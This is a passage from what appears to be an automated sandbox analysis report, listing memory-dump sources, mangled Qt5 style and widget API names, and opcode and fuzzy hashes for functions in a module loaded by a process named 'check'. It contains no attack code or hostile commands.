                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Widget@@$?inherits@?parentObject@@Widget@$Window@
                                                                                                                                                                                                                • String ID: QAbstractItemView$QLineEdit
                                                                                                                                                                                                                • API String ID: 493133685-1489152316
                                                                                                                                                                                                                • Opcode ID: 88e7479219e4533c88c3883da745b04df2c290eb31c9fe6953d790f421766a92
                                                                                                                                                                                                                • Instruction ID: 87d83e105b27c5040dd99f53b5089872c1cfe4571c3ca9108609b8d9e1191e63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88e7479219e4533c88c3883da745b04df2c290eb31c9fe6953d790f421766a92
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00015E15E0960A41EF568B42B44497623909F57BA6B08D136CC3D0FBC0FF2CE44583A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$OptionV0@@$Box@@Complex@@Option@@Point@@Rect@@Size@@@Slider@@Spinmalloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1040906481-0
                                                                                                                                                                                                                • Opcode ID: 36026e2983d26a15a9fce9d9a6907731966e9e1d2119287ba5f29f7262519c73
                                                                                                                                                                                                                • Instruction ID: 194b87f441689741e19441caeb024306b24304dd0ee526fd99de5470c34ae67c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36026e2983d26a15a9fce9d9a6907731966e9e1d2119287ba5f29f7262519c73
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731E122E0920282EF56DB14A514A3972A1EF53BA6F04C03ACA3D0F7C5EE3DE4418B90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?getHWNDForWidget@QApplicationPrivate@@SAPEAUHWND__@@PEBVQWidget@@@Z.QT5WIDGETS(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF252E9
                                                                                                                                                                                                                • ?allWindows@QGuiApplication@@SA?AV?$QList@PEAVQWindow@@@@XZ.QT5GUI(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF2530C
                                                                                                                                                                                                                • ?isTopLevel@QWindow@@QEBA_NXZ.QT5GUI(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF2533A
                                                                                                                                                                                                                • ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ.QT5GUI(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF25347
                                                                                                                                                                                                                • ?handle@QWindow@@QEBAPEAVQPlatformWindow@@XZ.QT5GUI(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF25355
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00007FFAFDF25369
                                                                                                                                                                                                                • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF253A4
                                                                                                                                                                                                                • ?winId@QWindow@@QEBA_KXZ.QT5GUI(?,?,?,?,00007FFAFDF17582), ref: 00007FFAFDF253BA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window@@$Window$?all?dispose@?get?handle@?type@?winApplicationApplication@@D__@@Data@1@@Data@@DesktopLevel@ListList@PlatformPrivate@@Qt@@Type@Widget@Widget@@@Window@@@@Windows@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2173915942-0
                                                                                                                                                                                                                • Opcode ID: 5358d2ae826c1075468a888f0c04f916225877a9df995706516478896c3148de
                                                                                                                                                                                                                • Instruction ID: 4f3b568f368ee39c7fd5dd81ae5b4374bc1104886251fcf7ed9561362e5d44d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5358d2ae826c1075468a888f0c04f916225877a9df995706516478896c3148de
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D21D631A1AA4182EB568F01D45093C7361FF87F62B189136D97E0B7D4EF2CE98187A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@$?fillBrush@@@Painter@@Rect@Rect@@$ColorColor@@$?brush@?color@BrushGroup@1@Palette@@Qt@@@Role@1@@Style@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 841669753-0
                                                                                                                                                                                                                • Opcode ID: f54d8d18b9149d76d5b00d71cb1752fdbff16c0bfaa421317b91bf096b0314be
                                                                                                                                                                                                                • Instruction ID: 3b74782fb1bb35382e89aeebc4c081a588bbd67f679d5304061de95e6ccd2aae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f54d8d18b9149d76d5b00d71cb1752fdbff16c0bfaa421317b91bf096b0314be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D51BE73A086818BD311CF69E44459EB7B0FB84365F404026DBAA87A68EB7CF486CF50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Color$Color@@$Group@1@Palette@@$?brush@?color@?darker@?set?unpolish@BrushBrush@Brush@@@Qt@@@Role@1@Role@1@@Style@Style@@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 120035416-0
                                                                                                                                                                                                                • Opcode ID: f104f70a8d700ed64441b475f1d3fff9efed745c36c8aeb7023fcfa44b4f2163
                                                                                                                                                                                                                • Instruction ID: c2a9baee53e057079ba97098d3642a156dfcffd6385e6ba5b72a32fa127ef103
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f104f70a8d700ed64441b475f1d3fff9efed745c36c8aeb7023fcfa44b4f2163
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21CD7261634197E74A8F34E41256ABB30FB4AB65F808036CA5E86360EF3DD042CF10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Painter@@$Brush@@ColorRect@@$?brush@?color@?draw?restore@?save@?setColor@@Color@@@Group@1@Palette@@Pen@Point@@0@Rects@Role@1@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 308093406-0
                                                                                                                                                                                                                • Opcode ID: 7e15410fbc9d7aef28c79b8029416493c98cc2b6d82f744acc113d07f197661d
                                                                                                                                                                                                                • Instruction ID: c7b103662ab37d4a2c03ff9bdce4de010099fdefcfe6d41cdd7f0a25b96cb88f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e15410fbc9d7aef28c79b8029416493c98cc2b6d82f744acc113d07f197661d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8116032B086818AE712CF69E4045AD73B0FB8A765F408033DE6D47654EF3CD585CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Color$Color@@$Group@1@Palette@@$?brush@?color@?darker@?set?unpolish@BrushBrush@Brush@@@Qt@@@Role@1@Role@1@@Style@Style@@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 120035416-0
                                                                                                                                                                                                                • Opcode ID: cc9ce627a63ea2ff73d30a4ad42ea2f010f3b4025e6dc7127df8e93b6adb2bd3
                                                                                                                                                                                                                • Instruction ID: b57f17ff7102fa237145e42f9e7083efbcb5e391e6a0ace5c8429a10cd675386
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc9ce627a63ea2ff73d30a4ad42ea2f010f3b4025e6dc7127df8e93b6adb2bd3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD018865B1864582EB11DB11E815966B360FF8BBA2F808032DD6E0B7A4FF3CE145CB50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Option$?native?proxy@Button@@Factor@MetricPartPointPoint@Point@@Private@@ScaleSizeStyle@@Tab@@ThemeV0@@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 771988995-0
                                                                                                                                                                                                                • Opcode ID: a79d4c3db3326b96b1ce712d03fa325047ba7a1765eabade1f515e1c0856f561
                                                                                                                                                                                                                • Instruction ID: 5798cbb5bf5850ba8c49777e4fd90bd244826bcdc16b99f8978fb3c59d08bce3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a79d4c3db3326b96b1ce712d03fa325047ba7a1765eabade1f515e1c0856f561
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7A187329187C18AE722CF34D8417E977A4FB46368F44823AEA6D4B698EF38E545C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Point@@$Rect@@Size@@@$?nativeFactor@MetricPartPointPoint@Private@@ScaleSizeStyleThemeWidget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 378173180-0
                                                                                                                                                                                                                • Opcode ID: 044916861e3eef6a78744a840fcbb2bb780590dad6a72c215454874c8b7c841f
                                                                                                                                                                                                                • Instruction ID: 55ce0ec64539afa59d1d89624421f8826f95359e4ac0ee4c7e197aa775938e37
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044916861e3eef6a78744a840fcbb2bb780590dad6a72c215454874c8b7c841f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49713673908BC58AD712CF38D8505E977B0F785768F509226EB5D4BAA8EF38E185CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$MetricsStyle@@System$?dpi?native?proxy@?visualDirection@Factor@Helper@@LayoutMetricOption@@@Private@@Qt@@Rect@Rect@@ScaleScaled@V2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 369329258-0
                                                                                                                                                                                                                • Opcode ID: 3bf3229bdf316d989ab4729c5ff7e4e8c0f7bafe1b7fde23cfa209029b6e4202
                                                                                                                                                                                                                • Instruction ID: 5c3243618ac283e8491fc5e57953ae8e90ea565409e31223a89905ba36b7ecd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bf3229bdf316d989ab4729c5ff7e4e8c0f7bafe1b7fde23cfa209029b6e4202
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9941C372A246458AE3228F79D404AAD7760FB56799F00C233CE6E5BF98EE3CE4458750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$MetricsStyle@@System$?dpi?native?proxy@?visualDirection@Factor@Helper@@LayoutMetricOption@@@Private@@Qt@@Rect@Rect@@ScaleScaled@V2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 369329258-0
                                                                                                                                                                                                                • Opcode ID: 4215669e7709d5137d8b6666ee5106cfb2dbdbf181f59134d67591b139e5c98e
                                                                                                                                                                                                                • Instruction ID: cee7442a72a9a410708efb2e980da9e262f1cc5c0698a39fd9732802dbc9b188
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4215669e7709d5137d8b6666ee5106cfb2dbdbf181f59134d67591b139e5c98e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E141F572A246458AE322CF79D404AAD7760FB56799F00C233CE6E57B98EE3DE446C350
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Style$Helper@@$?dpiScaled@$Option@@@$Style@@$?dpi@?proxy@Icon@@MetricsSystem$?actual?native?visualDirection@Factor@LayoutMetricMode@1@Null@Private@@Qt@@Rect@Rect@@ScaleSize@Size@@State@1@@V2@1@Widget@@@Windows
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1112638000-0
                                                                                                                                                                                                                • Opcode ID: 4aa1324a89eea96a9832725edf3d55ad887a76632ebe7274ba8a1eb64ae677b8
                                                                                                                                                                                                                • Instruction ID: 959d367f9f770d9bea516dee1f13d46e84e7c4ff06d3eb271662024e6c2a1701
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa1324a89eea96a9832725edf3d55ad887a76632ebe7274ba8a1eb64ae677b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A241D472A246458AE322CF79D404AAD7760FB56799F00C233CE6E5BB98EE3CE445C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Image@@Pixel$?deviceApplication@@Ratio@$?fill@?instance@?setCoreDeviceDevice@@Format@0@@PaintRatioSize@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2552344935-0
                                                                                                                                                                                                                • Opcode ID: 3777e26fa3747fb936931cc4d0ea16ff0214869bab89f2519dad024223871a64
                                                                                                                                                                                                                • Instruction ID: 8d134b59974e17c09aac20d364daa2e38cac952ed42245d62e9563b0a93c63c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3777e26fa3747fb936931cc4d0ea16ff0214869bab89f2519dad024223871a64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B312561D1DB418BDB139732B8104216364AFAB7E6700C337ED3F666A4EF2AB0928650
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Option@@Style
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3950800569-0
                                                                                                                                                                                                                • Opcode ID: 33bfab6f67f6ddd577557e138cee51d5c2dc608895f992040069cc24530edc28
                                                                                                                                                                                                                • Instruction ID: 455c5c3ea21d40bc9480a45cddf35c85dd57668da3e0c5bd90c9db6f2d6df9f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33bfab6f67f6ddd577557e138cee51d5c2dc608895f992040069cc24530edc28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43118222E4B106C2FB670B5194156392151DB47B36F24C036CE3E0D3D0AE3DA8C797B1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String@@$A@$$V0@@$?fromArray@Char
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2960922311-0
                                                                                                                                                                                                                • Opcode ID: f1abc3da5d1d6278bcc6e20e080a904ba7e2320707363a54bdf616318cf414cb
                                                                                                                                                                                                                • Instruction ID: c9c3b2a0415ae7c86e2b74f45fe665f3ab84155c3ad926aa1317176df6c0bdc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1abc3da5d1d6278bcc6e20e080a904ba7e2320707363a54bdf616318cf414cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0A461B1494692DB018B11E8458787321FF8BFA2B449032DD3E0B3E8EE2CD589C760
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@ColorPen@@$?brush@?setGroup@1@JoinPainter@@Palette@@Pen@Pen@@@Qt@@Role@1@@Style@Style@3@Style@3@@
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 914583510-2766056989
                                                                                                                                                                                                                • Opcode ID: 3b0eb25a1c4768a36c89c632dd192c36ef1802a751325b595f53e885af238b3a
